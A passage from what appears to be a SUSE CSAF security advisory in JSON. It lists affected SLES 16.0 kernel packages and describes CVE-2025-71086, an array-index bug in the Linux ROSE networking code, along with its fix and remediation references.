"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71086",
"url": "https://www.suse.com/security/cve/CVE-2025-71086"
},
{
"category": "external",
"summary": "SUSE Bug 1256625 for CVE-2025-71086",
"url": "https://bugzilla.suse.com/1256625"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
